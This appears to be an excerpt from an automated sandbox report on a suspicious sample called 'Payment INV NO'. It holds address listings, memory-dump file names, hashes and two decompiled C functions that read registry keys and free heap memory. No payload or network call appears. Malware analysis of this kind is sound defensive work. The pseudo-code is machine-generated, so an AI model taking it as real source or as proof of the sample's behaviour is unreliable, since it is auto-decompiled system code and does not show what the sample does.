                                                          0x01804123
                                                          0x01804130
                                                          0x01804132
                                                          0x01804135
                                                          0x0180413c
                                                          0x0180413c
                                                          0x0180413e
                                                          0x0180413e
                                                          0x01804140
                                                          0x01804140
                                                          0x01804163
                                                          0x017be8e9
                                                          0x017be8ec
                                                          0x017be8ec
                                                          0x017be8ec
                                                          0x017be8e3
                                                          0x017be8d7
                                                          0x017be8ef
                                                          0x017be8f2
                                                          0x017be8f4
                                                          0x017be8f9
                                                          0x017be8fb
                                                          0x017be8fe
                                                          0x017be9f7
                                                          0x017be9f9
                                                          0x017be9f9
                                                          0x017be906
                                                          0x017be907
                                                          0x017be909
                                                          0x017be90d
                                                          0x017be911
                                                          0x017be914
                                                          0x017bea27
                                                          0x017bea2e
                                                          0x017bea36
                                                          0x017bea3a
                                                          0x017bea40
                                                          0x017bea47
                                                          0x01804182
                                                          0x01804182
                                                          0x017be91a
                                                          0x017be91a
                                                          0x017be920
                                                          0x017be927
                                                          0x0180419e
                                                          0x0180419e
                                                          0x017be927
                                                          0x017be936
                                                          0x017be939
                                                          0x017be93c
                                                          0x017be93f
                                                          0x017be944
                                                          0x017be946
                                                          0x017be94a
                                                          0x017bea04
                                                          0x017bea07
                                                          0x017bea0a
                                                          0x018041a6
                                                          0x018041aa
                                                          0x017bea10
                                                          0x017bea10
                                                          0x017bea10
                                                          0x017bea16
                                                          0x017bea1d
                                                          0x017be950
                                                          0x017be950
                                                          0x017be952
                                                          0x017be955
                                                          0x018041b3
                                                          0x018041b6
                                                          0x017be95b
                                                          0x017be95b
                                                          0x017be95b
                                                          0x017be95e
                                                          0x017be961
                                                          0x017be964
                                                          0x017be967
                                                          0x017be96a
                                                          0x017be96c
                                                          0x017be9de
                                                          0x017be96e
                                                          0x017be97e
                                                          0x017be981
                                                          0x017be981
                                                          0x017be981
                                                          0x017be98f
                                                          0x017be99c
                                                          0x017be99c
                                                          0x017be9a1
                                                          0x017be9a5
                                                          0x017be9a8
                                                          0x017be9e2
                                                          0x017be9e4
                                                          0x018041bf
                                                          0x018041bf
                                                          0x017be9eb
                                                          0x017be9f0
                                                          0x00000000
                                                          0x017be9aa
                                                          0x017be9aa
                                                          0x017be9ae
                                                          0x018041c8
                                                          0x018041c8
                                                          0x018041cb
                                                          0x018041cf
                                                          0x018041d0
                                                          0x018041d0
                                                          0x018041d2
                                                          0x018041d2
                                                          0x018041d4
                                                          0x018041d7
                                                          0x018041da
                                                          0x018041dc
                                                          0x017be9b7
                                                          0x017be9b7
                                                          0x017be9bb
                                                          0x0180420a
                                                          0x0180420e
                                                          0x0180420e
                                                          0x017be9d6
                                                          0x00000000
                                                          0x018041e2
                                                          0x018041e6
                                                          0x018041e6
                                                          0x018041e9
                                                          0x018041f5
                                                          0x018041fb
                                                          0x018041fb
                                                          0x00000000
                                                          0x018041e9
                                                          0x018041dc
                                                          0x017be9b4
                                                          0x017be9b4
                                                          0x00000000
                                                          0x017be9b4
                                                          0x017be84c
                                                          0x017be84c
                                                          0x017be84f
                                                          0x017be852
                                                          0x017be857
                                                          0x017be85b
                                                          0x017be88a
                                                          0x017be88a
                                                          0x00000000
                                                          0x017be85d
                                                          0x017be85d
                                                          0x017be85f
                                                          0x00000000
                                                          0x017be85f
                                                          0x017be85b
                                                          0x017be894
                                                          0x00000000
                                                          0x017be894

                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 018040CB
                                                          • HEAP[%wZ]: , xrefs: 018040A9
                                                          • HEAP: , xrefs: 018040B6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 0a6afc6636e3cd189efd3212a416196ca570768c75f7322050dcbf4656c512f3
                                                          • Instruction ID: 9e7a1beb4abdc8bd9f6c76063826c9693891490a97a01cd290c9b8dabf65ec68
                                                          • Opcode Fuzzy Hash: 0a6afc6636e3cd189efd3212a416196ca570768c75f7322050dcbf4656c512f3
                                                          • Instruction Fuzzy Hash: 76E1F170A006499BDB6ACF28C8857FAFBF1AF44304F14845DEA86CB385DB34E945CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179EC9B Relevance: 4.1, Strings: 3, Instructions: 320COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E0179EC9B(signed int __ecx, signed int _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16) {
				char* _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v148;
				void* _v152;
				void* _v160;
				void* _v172;
				unsigned int _t108;
				void* _t119;
				void* _t127;
				void* _t137;
				void* _t158;
				char* _t172;
				unsigned int _t173;
				void* _t178;
				intOrPtr _t183;
				void* _t186;
				void* _t193;
				signed int _t195;
				void* _t197;
				signed int _t199;
				signed int _t201;
				void* _t203;

				_t203 = (_t201 & 0xfffffff8) - 0x74;
				_t172 = _a12;
				_v104 = __ecx;
				_v100 = 0;
				_v112 = 0;
				_v108 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t193 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t172 == 0 || _a16 == 0) {
					_t197 = 0xc000000d;
					goto L43;
				} else {
					_t199 = _a4;
					 *_t172 = 0;
					if(_t199 == 1 || _t199 == 0) {
						E017DBB40(0,  &_v84, 0x1774de0);
						_v84 = 0x18;
						_v76 =  &_v92;
						_v116 = 0;
						_push( &_v84);
						_push(0x20019);
						_v80 = 0;
						_push( &_v116);
						_v72 = 0x40;
						_v68 = 0;
						_v64 = 0;
						if(E017D9600() >= 0) {
							_t127 = E0179BAA0(_v108, _v104,  &_v116);
							_t193 = _v128;
							_t197 = _t127;
							if(_t197 != 0 || _t193 == 0) {
								_t183 = _v108;
								_t199 = _a4;
								goto L7;
							} else {
								goto L44;
							}
						} else {
							_t183 = 0;
							_v108 = 0;
							L7:
							if(_t199 == 1 && _t183 != 0 && L0184D191(_t183,  &_v117) >= 0) {
								asm("sbb eax, eax");
								_a4 = _t199 &  ~(_v117 - 0x00000001 & 0x000000ff);
							}
							_t189 = 0;
							_t184 = 0x2000000;
							_t197 = E0179F108(0, _t183, _t183,  &_v100);
							if(_t197 < 0) {
								L45:
								 *_t172 = 1;
								goto L43;
							} else {
								if(_a4 != 1) {
									E017DBB40(0x2000000,  &_v84, 0x1774c90);
									_t197 = 0;
									_v32 = _v108;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v120 = 0;
									_push( &_v120);
									_v36 = 0x18;
									 *((intOrPtr*)(_t203 + 0x80)) = 0x40;
									 *((intOrPtr*)(_t203 + 0x84)) = 0;
									 *((intOrPtr*)(_t203 + 0x88)) = 0;
									if(E017D9600() < 0) {
										 *_t172 = 1;
										L44:
										_t178 = 0;
										L17:
										_t115 = _a4;
										if(_a4 != 0 || _t193 != 0 &&  *((intOrPtr*)(_t193 + 4)) != _t178) {
											_t175 = _v104;
											L21:
											if(_t193 == 0) {
												_t193 = E017A7608(1, _t189 & 0xffffff00 | _t115 != 0x00000001, _t175);
												if(_t193 == 0) {
													_t197 = 0xc0000017;
												}
											}
											goto L23;
										} else {
											_t175 = _v104;
											_t119 = L0184E0E9(_v104, _t189, _t172,  &_v116);
											_t193 = _v124;
											_t197 = _t119;
											if(_t197 != 0) {
												L23:
												 *_a16 = _t193;
												L24:
												_t107 = _v88;
												if(_v88 == 0) {
													L48:
													_t173 = 0;
													L26:
													if(_v112 != 0) {
														_push(_v112);
														E017D95D0();
														_v116 = _t173;
													}
													_t108 = _v100;
													if(_t108 != 0) {
														if(_t108 != 0xffffffff) {
															 *0x1776cc4(_t108);
														}
														_v100 = _t173;
													}
													if(_v108 != 0) {
														_push(_v108);
														E017D95D0();
													}
													goto L33;
												}
												_t173 = 0;
												E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
												goto L26;
											}
											_t115 = _a4;
											goto L21;
										}
									}
									_t137 = 0x1774cd0;
									L15:
									E017DBB40(_t184,  &_v84, _t137);
									_push(_t184);
									_t189 =  &_v92;
									_t186 = E0179F018(_v120,  &_v92,  &_v104, _t197,  &_v100);
									_t197 = 0xc0000034;
									if(_t186 != 0xc0000034) {
										_t143 = _v96;
										if(_v96 == 0) {
											goto L16;
										}
										if(_t186 != 0x80000005) {
											goto L48;
										}
										_t195 = E017B4620(_t186,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t143 + 2);
										_v104 = _t195;
										if(_t195 == 0) {
											_t197 = 0xc0000017;
											goto L48;
										}
										_push(_t186);
										_t189 =  &_v88;
										_t197 = E0179F018(_v116,  &_v88,  &_v100, _t195,  &_v96);
										if(_t197 < 0) {
											L42:
											_t193 = _v124;
											L43:
											if(_t197 != 0) {
												goto L24;
											}
											goto L44;
										}
										if(_v104 != 7) {
											if(_v104 == 1) {
												goto L41;
											}
											_t193 = _v124;
											_t178 = 0;
											_t197 = 0;
											 *_t172 = 1;
											goto L17;
										}
										L41:
										_t189 = _t195;
										_t197 = E017A38A4(_v112, _t195, _v100 >> 1, 8, (0 | _v100 >> 0x00000001 != 0x00000000) + 2, 1,  &_v124);
										goto L42;
									}
									L16:
									_t178 = 0;
									 *_t172 = 1;
									_t197 = 0;
									goto L17;
								}
								_t158 = E0179E420(0x2000000, _v100, _v104,  &_v116);
								_t193 = _v128;
								_t197 = _t158;
								if(_t197 == 0) {
									if(_t193 != 0) {
										goto L23;
									}
								}
								E017DBB40(_t184,  &_v84, 0x1774c34);
								_t184 = 0;
								_v56 = _v108;
								_v52 =  &_v92;
								_push( &_v60);
								_push(0x20019);
								_v120 = 0;
								_push( &_v120);
								_v60 = 0x18;
								_v48 = 0x40;
								_v44 = 0;
								_v40 = 0;
								_t197 = E017D9600();
								if(_t197 < 0) {
									goto L45;
								}
								_t137 = 0x1774c60;
								if(_a8 != 3) {
									_t137 = 0x17836ac;
								}
								_t197 = 0;
								goto L15;
							}
						}
					} else {
						_t197 = 0xc000000d;
						L33:
						return _t197;
					}
				}
			}





















































                                                          0x0179eca3
                                                          0x0179eca7
                                                          0x0179ecae
                                                          0x0179ecb2
                                                          0x0179ecb6
                                                          0x0179ecba
                                                          0x0179ecbe
                                                          0x0179ecc6
                                                          0x0179ecca
                                                          0x0179ecce
                                                          0x0179ecd4
                                                          0x0179ecd6
                                                          0x0179ecdc
                                                          0x017f5952
                                                          0x00000000
                                                          0x0179ecf3
                                                          0x0179ecf3
                                                          0x0179ecf6
                                                          0x0179ecfb
                                                          0x0179ed0f
                                                          0x0179ed18
                                                          0x0179ed20
                                                          0x0179ed2a
                                                          0x0179ed2e
                                                          0x0179ed2f
                                                          0x0179ed38
                                                          0x0179ed3c
                                                          0x0179ed3d
                                                          0x0179ed45
                                                          0x0179ed49
                                                          0x0179ed54
                                                          0x017f58d5
                                                          0x017f58da
                                                          0x017f58de
                                                          0x017f58e2
                                                          0x017f58ec
                                                          0x017f58f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179ed5a
                                                          0x0179ed5a
                                                          0x0179ed5c
                                                          0x0179ed60
                                                          0x0179ed63
                                                          0x017f5914
                                                          0x017f5918
                                                          0x017f5918
                                                          0x0179ed71
                                                          0x0179ed76
                                                          0x0179ed80
                                                          0x0179ed84
                                                          0x0179f002
                                                          0x0179f002
                                                          0x00000000
                                                          0x0179ed8a
                                                          0x0179ed8e
                                                          0x0179ef03
                                                          0x0179ef0c
                                                          0x0179ef0e
                                                          0x0179ef16
                                                          0x0179ef1e
                                                          0x0179ef1f
                                                          0x0179ef28
                                                          0x0179ef2c
                                                          0x0179ef2d
                                                          0x0179ef35
                                                          0x0179ef40
                                                          0x0179ef47
                                                          0x0179ef55
                                                          0x0179f007
                                                          0x0179effb
                                                          0x0179effb
                                                          0x0179ee5a
                                                          0x0179ee5a
                                                          0x0179ee5f
                                                          0x0179ee73
                                                          0x0179ee77
                                                          0x0179ee79
                                                          0x0179ee8a
                                                          0x0179ee8e
                                                          0x017f5983
                                                          0x017f5983
                                                          0x0179ee8e
                                                          0x00000000
                                                          0x017f595c
                                                          0x017f5962
                                                          0x017f5968
                                                          0x017f596d
                                                          0x017f5971
                                                          0x017f5975
                                                          0x0179ee94
                                                          0x0179ee97
                                                          0x0179ee99
                                                          0x0179ee99
                                                          0x0179ee9f
                                                          0x0179f011
                                                          0x0179f011
                                                          0x0179eeb7
                                                          0x0179eebc
                                                          0x0179eebe
                                                          0x0179eec2
                                                          0x0179eec7
                                                          0x0179eec7
                                                          0x0179eecb
                                                          0x0179eed1
                                                          0x0179eed6
                                                          0x0179eed9
                                                          0x0179eed9
                                                          0x0179eedf
                                                          0x0179eedf
                                                          0x0179eee8
                                                          0x017f598d
                                                          0x017f5991
                                                          0x017f5991
                                                          0x00000000
                                                          0x0179eee8
                                                          0x0179eeac
                                                          0x0179eeb2
                                                          0x00000000
                                                          0x0179eeb2
                                                          0x017f597b
                                                          0x00000000
                                                          0x017f597b
                                                          0x0179ee5f
                                                          0x0179ef5b
                                                          0x0179ee20
                                                          0x0179ee26
                                                          0x0179ee2b
                                                          0x0179ee3b
                                                          0x0179ee44
                                                          0x0179ee46
                                                          0x0179ee4d
                                                          0x0179ef65
                                                          0x0179ef6b
                                                          0x00000000
                                                          0x00000000
                                                          0x0179ef77
                                                          0x00000000
                                                          0x00000000
                                                          0x0179ef91
                                                          0x0179ef93
                                                          0x0179ef99
                                                          0x0179f00c
                                                          0x00000000
                                                          0x0179f00c
                                                          0x0179ef9b
                                                          0x0179efab
                                                          0x0179efb4
                                                          0x0179efb8
                                                          0x0179efef
                                                          0x0179efef
                                                          0x0179eff3
                                                          0x0179eff5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179eff5
                                                          0x0179efbf
                                                          0x017f593c
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5942
                                                          0x017f5946
                                                          0x017f5948
                                                          0x017f594a
                                                          0x00000000
                                                          0x017f594a
                                                          0x0179efc5
                                                          0x0179efd0
                                                          0x0179efed
                                                          0x00000000
                                                          0x0179efed
                                                          0x0179ee53
                                                          0x0179ee53
                                                          0x0179ee55
                                                          0x0179ee58
                                                          0x00000000
                                                          0x0179ee58
                                                          0x0179eda1
                                                          0x0179eda6
                                                          0x0179edaa
                                                          0x0179edae
                                                          0x017f5922
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5928
                                                          0x0179edbe
                                                          0x0179edc7
                                                          0x0179edc9
                                                          0x0179edd1
                                                          0x0179edd9
                                                          0x0179edda
                                                          0x0179ede3
                                                          0x0179ede7
                                                          0x0179ede8
                                                          0x0179edf0
                                                          0x0179edf8
                                                          0x0179edfc
                                                          0x0179ee05
                                                          0x0179ee09
                                                          0x00000000
                                                          0x00000000
                                                          0x0179ee13
                                                          0x0179ee18
                                                          0x017f592d
                                                          0x017f592d
                                                          0x0179ee1e
                                                          0x00000000
                                                          0x0179ee1e
                                                          0x0179ed84
                                                          0x017f58be
                                                          0x017f58be
                                                          0x0179eeee
                                                          0x0179eef6
                                                          0x0179eef6
                                                          0x0179ecfb

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@
                                                          • API String ID: 0-1177533131
                                                          • Opcode ID: 78ba4874cd2154ccd64cce63024b146c1d77ae4b1cd6d8dd3ec7fdd86595a555
                                                          • Instruction ID: b43189943c0baa43eec3f8070fae2e003a73a14cd872612eea1f3f248b467570
                                                          • Opcode Fuzzy Hash: 78ba4874cd2154ccd64cce63024b146c1d77ae4b1cd6d8dd3ec7fdd86595a555
                                                          • Instruction Fuzzy Hash: 9BC17D725083559FDB25CF28D884A6BFBE8BB88714F05492EF999D7340DB30D948CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179E9ED Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E0179E9ED(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				signed int _v160;
				void* _v161;
				signed int _v164;
				void* _v165;
				signed int _v168;
				void* _v172;
				void* _v176;
				void* _v180;
				void* _v188;
				void* _v196;
				signed int _t110;
				signed int _t114;
				signed int _t136;
				void* _t148;
				signed int _t161;
				void* _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr* _t181;
				signed int _t184;
				char _t186;
				signed int _t187;
				void* _t189;

				_t189 = (_t187 & 0xfffffff8) - 0x9c;
				_t163 = __ecx;
				_t181 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t184 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E017DBB40(__ecx,  &_v140, 0x1774de0);
					_t186 = 0x18;
					_v132 = _t186;
					_v124 =  &_v148;
					_t171 = 0;
					_v168 = 0;
					_push( &_v132);
					_push(0x20019);
					_v128 = 0;
					_push( &_v168);
					_v120 = 0x40;
					_v116 = 0;
					_v112 = 0;
					if(E017D9600() >= 0) {
						_t171 = _v160;
						_t184 = L0184D208(_v160, _a4,  &_v145,  &_v132);
						__eflags = _t184;
						if(_t184 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E017D95D0();
							}
							if(_v144 != 0) {
								_push(_v144);
								E017D95D0();
							}
							_t110 = _v152;
							if(_t110 != 0 && _t110 != 0xffffffff) {
								 *0x1776cc4(_t110);
							}
							if(_t184 < 0) {
								__eflags = _t181;
								if(_t181 == 0) {
									goto L19;
								}
								_t165 = _v128;
								__eflags =  *_t181 - _t165;
								if( *_t181 == _t165) {
									goto L19;
								}
								__eflags =  *_t181;
								if( *_t181 != 0) {
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t181);
								}
								goto L46;
							} else {
								if( *_t181 == 0) {
									_t114 = E0179F2F0(1);
									 *_t181 = _t114;
									__eflags = _t114;
									if(_t114 != 0) {
										goto L19;
									}
									_t165 = _v128;
									_t184 = 0xc0000017;
									L46:
									 *_t181 = _t165;
								}
								L19:
								return _t184;
							}
						}
						__eflags = _t163 - 8;
						if(_t163 == 8) {
							_t171 = _v160;
							 *((char*)(_t189 + 0x13)) = 0;
							_t161 = L0184D191(_v160, _t189 + 0x13);
							__eflags = _t161;
							if(_t161 == 0) {
								__eflags =  *((char*)(_t189 + 0x13)) - 1;
								if( *((char*)(_t189 + 0x13)) == 1) {
									_t163 = 4;
								}
							}
						}
						_push(_v160);
						E017D95D0();
						_v164 = _v164 & 0x00000000;
						_t186 = 0x18;
					}
					_t172 = 0x2000000;
					if(E0179F108(0, _t171, _t171,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t163 == 8) {
						__eflags = _v152;
						if(_v152 == 0) {
							goto L36;
						}
						E017DBB40(_t172,  &_v140, 0x1774bd0);
						_v152 = _v152 & 0x00000000;
						_v92 = _v92 & 0x00000000;
						 *(_t189 + 0x5c) =  *(_t189 + 0x5c) & 0x00000000;
						_v104 = _v160;
						_t166 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t186;
						_push( &_v152);
						_v96 = _t166;
						_t136 = E017D9600();
						__eflags = _t136;
						if(_t136 >= 0) {
							_t172 = _v144;
							_t184 = L0184D208(_v144, _a4,  &_v145,  &_v132);
							__eflags = _t184;
							if(_t184 >= 0) {
								goto L11;
							}
							_t186 = 0x18;
						}
						E017DBB40(_t172,  &_v140, 0x1774a48);
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						_v80 = _v160;
						_v76 =  &_v148;
						_push(_t189 + 0x60);
						_push(0x20019);
						 *((intOrPtr*)(_t189 + 0x68)) = _t186;
						_push( &_v168);
						_v72 = _t166;
						_t184 = E017D9600();
						__eflags = _t184;
						if(_t184 >= 0) {
							goto L10;
						}
						__eflags = _t184 - 0xc0000034;
						goto L35;
					} else {
						if(_t163 != 4) {
							L10:
							_t184 = E0179F1E4(_v160, _t181, _a4);
							goto L11;
						}
						if(_v152 == 0) {
							_t148 = 0xc0000034;
						} else {
							E017DBB40(_t172,  &_v140, 0x1774aa0);
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t186;
							_push( &_v168);
							_v48 = 0x40;
							_t148 = E017D9600();
						}
						if(_t148 < 0) {
							E017DBB40(_t172,  &_v140, 0x1774b20);
							_v168 = _v168 & 0x00000000;
							 *(_t189 + 0x94) =  *(_t189 + 0x94) & 0x00000000;
							 *(_t189 + 0xa0) =  *(_t189 + 0xa0) & 0x00000000;
							 *(_t189 + 0xa4) =  *(_t189 + 0xa4) & 0x00000000;
							 *((intOrPtr*)(_t189 + 0x98)) =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t186;
							_push( &_v168);
							 *((intOrPtr*)(_t189 + 0xa8)) = 0x40;
							_t184 = E017D9600();
							if(_t184 < 0) {
								__eflags = _t184 - 0xc0000034;
								L35:
								if(__eflags != 0) {
									goto L11;
								}
								L36:
								_t184 = 0;
								goto L11;
							}
						}
						goto L10;
					}
				}
			}






















































                                                          0x0179e9f5
                                                          0x0179e9ff
                                                          0x0179ea02
                                                          0x0179ea04
                                                          0x0179ea08
                                                          0x0179ea0c
                                                          0x0179ea10
                                                          0x0179ea16
                                                          0x017f5857
                                                          0x00000000
                                                          0x0179ea25
                                                          0x0179ea27
                                                          0x0179ea35
                                                          0x0179ea3c
                                                          0x0179ea41
                                                          0x0179ea45
                                                          0x0179ea49
                                                          0x0179ea4f
                                                          0x0179ea53
                                                          0x0179ea54
                                                          0x0179ea5d
                                                          0x0179ea61
